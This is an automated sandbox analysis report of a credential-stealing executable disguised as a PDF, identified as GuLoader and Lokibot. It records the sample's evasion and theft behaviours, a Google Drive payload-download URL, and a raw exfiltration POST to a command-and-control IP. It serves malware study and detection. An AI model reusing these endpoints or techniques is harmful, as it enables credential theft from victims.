Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Overview

General Information

Sample Name:REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
Analysis ID:756301
MD5:b9f70f4146b846179fa182ac868d0c15
SHA1:97cb5de0e0cc2f53cd73552f9d5b4381ab5a5907
SHA256:ff235029990af0449ce8f82c5546dfe37170d5e27ce1a22b0a43965a980344be
Infos:

Detection

GuLoader, Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Lokibot
Antivirus detection for URL or domain
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
One or more processes crash
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64native
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000002.00000002.54385682867.00000000007CC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
      00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        00000005.00000000.54201456373.0000000001660000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.11.20157.245.36.2749838802021641 11/30/22-00:31:37.333969
          SID:2021641
          Source Port:49838
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20157.245.36.2749838802024317 11/30/22-00:31:37.333969
          SID:2024317
          Source Port:49838
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20157.245.36.2749838802024312 11/30/22-00:31:37.333969
          SID:2024312
          Source Port:49838
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeReversingLabs: Detection: 17%
          Antivirus detection for URL or domain
          Source: http://157.245.36.27/~dokterpol/?page=2874Avira URL Cloud: Label: malware
          Machine Learning detection for sample
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeJoe Sandbox ML: detected
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\BekvemmelighederJump to behavior
          Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.11.20:49836 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49837 version: TLS 1.2
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: mshtml.pdb source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204236542.0000000000649000.00000008.00000001.01000000.00000006.sdmp
          Source: Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\ServiceSDK\Release\ScenarioProfilePlugIn\AsOpenFile.pdb source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr
          Source: Binary string: mshtml.pdbUGP source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204236542.0000000000649000.00000008.00000001.01000000.00000006.sdmp
          Source: Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\ServiceSDK\Release\ScenarioProfilePlugIn\AsOpenFile.pdb,,)GCTL source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_00406555 FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_0040287E FindFirstFileW,
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_00405A03 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.11.20:49838 -> 157.245.36.27:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49838 -> 157.245.36.27:80
          Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.11.20:49838 -> 157.245.36.27:80
          Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Joe Sandbox ViewIP Address: 157.245.36.27 157.245.36.27
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ZppbncXCwboWfcBo0A5zlqzevMjFwzpW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/65eu063p0f9eoc2qkjfmonuuk5gkqmq4/1669764675000/03238822727237126472/*/1ZppbncXCwboWfcBo0A5zlqzevMjFwzpW?e=download&uuid=c4bc146b-22c6-4e17-89b8-c96a6eb96fab HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-8k-docs.googleusercontent.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /~dokterpol/?page=2874 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 157.245.36.27Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A663AB80Content-Length: 178Connection: close
          Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
          Source: unknownTCP traffic detected without corresponding DNS query: 157.245.36.27
          Source: unknownTCP traffic detected without corresponding DNS query: 157.245.36.27
          Source: unknownTCP traffic detected without corresponding DNS query: 157.245.36.27
          Source: unknownTCP traffic detected without corresponding DNS query: 157.245.36.27
          Source: unknownTCP traffic detected without corresponding DNS query: 157.245.36.27
          Source: unknownTCP traffic detected without corresponding DNS query: 157.245.36.27
          Source: unknownTCP traffic detected without corresponding DNS query: 157.245.36.27
          Source: unknownTCP traffic detected without corresponding DNS query: 157.245.36.27
          Source: unknownTCP traffic detected without corresponding DNS query: 157.245.36.27
          Source: unknownTCP traffic detected without corresponding DNS query: 157.245.36.27
          Source: unknownTCP traffic detected without corresponding DNS query: 157.245.36.27
          Source: unknownTCP traffic detected without corresponding DNS query: 157.245.36.27
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54362021539.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54356420593.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392699460.0000000001943000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.drString found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.drString found in binary or memory: http://crl.globalsign.com/root.crl0G
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54362021539.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54356420593.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392699460.0000000001943000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204236542.0000000000649000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.drString found in binary or memory: http://ocsp.digicert.com0C
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.drString found in binary or memory: http://ocsp.digicert.com0O
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.drString found in binary or memory: http://ocsp.globalsign.com/rootr103
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.drString found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.drString found in binary or memory: http://www.digicert.com/CPS0
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204236542.0000000000649000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204053166.0000000000626000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54203683114.00000000005F2000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54203683114.00000000005F2000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54356841847.0000000001984000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392074084.0000000001919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54362021539.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391896205.0000000001901000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392699460.0000000001943000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0g-8k-docs.googleusercontent.com/
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391896205.0000000001901000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0g-8k-docs.googleusercontent.com/%%doc-0g-8k-docs.googleusercontent.com
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391896205.0000000001901000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0g-8k-docs.googleusercontent.com/)
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54362021539.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54356420593.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392699460.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392074084.0000000001919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0g-8k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/65eu063p
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391638858.00000000018E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391291036.00000000018B8000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393764611.0000000001C10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ZppbncXCwboWfcBo0A5zlqzevMjFwzpW
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391291036.00000000018B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ZppbncXCwboWfcBo0A5zlqzevMjFwzpWr
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204236542.0000000000649000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54363023216.000000001D4A0000.00000004.00001000.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54363172732.000000001D4AA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54363172732.000000001D4AA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54363172732.000000001D4AA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54363172732.000000001D4AA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.drString found in binary or memory: https://www.digicert.com/CPS0
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.drString found in binary or memory: https://www.globalsign.com/repository/0
          Source: unknownHTTP traffic detected: POST /~dokterpol/?page=2874 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 157.245.36.27Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A663AB80Content-Length: 178Connection: close
          Source: unknownDNS traffic detected: queries for: drive.google.com
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ZppbncXCwboWfcBo0A5zlqzevMjFwzpW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/65eu063p0f9eoc2qkjfmonuuk5gkqmq4/1669764675000/03238822727237126472/*/1ZppbncXCwboWfcBo0A5zlqzevMjFwzpW?e=download&uuid=c4bc146b-22c6-4e17-89b8-c96a6eb96fab HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-8k-docs.googleusercontent.comConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.11.20:49836 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49837 version: TLS 1.2
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_004054B0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 1980
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_004068DA
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_00404CED
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032ECB42
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032D6122
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032D5B37
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032D7306
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032D5944
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032EF95D
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032D17BD
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032D61DB
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032D3DD6
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032D6221
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032D7430
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032D7607
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032D5C06
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032D5E16
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032D727E
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032D587A
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032D5A43
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032EE6AB
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032D58A1
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032D6C8B
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032EC892
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032D74FA
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032DA6F5
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032D6CCB
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032ECCDC
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 5_2_0168101C
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032F07A4 NtProtectVirtualMemory,
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032F1813 NtResumeThread,
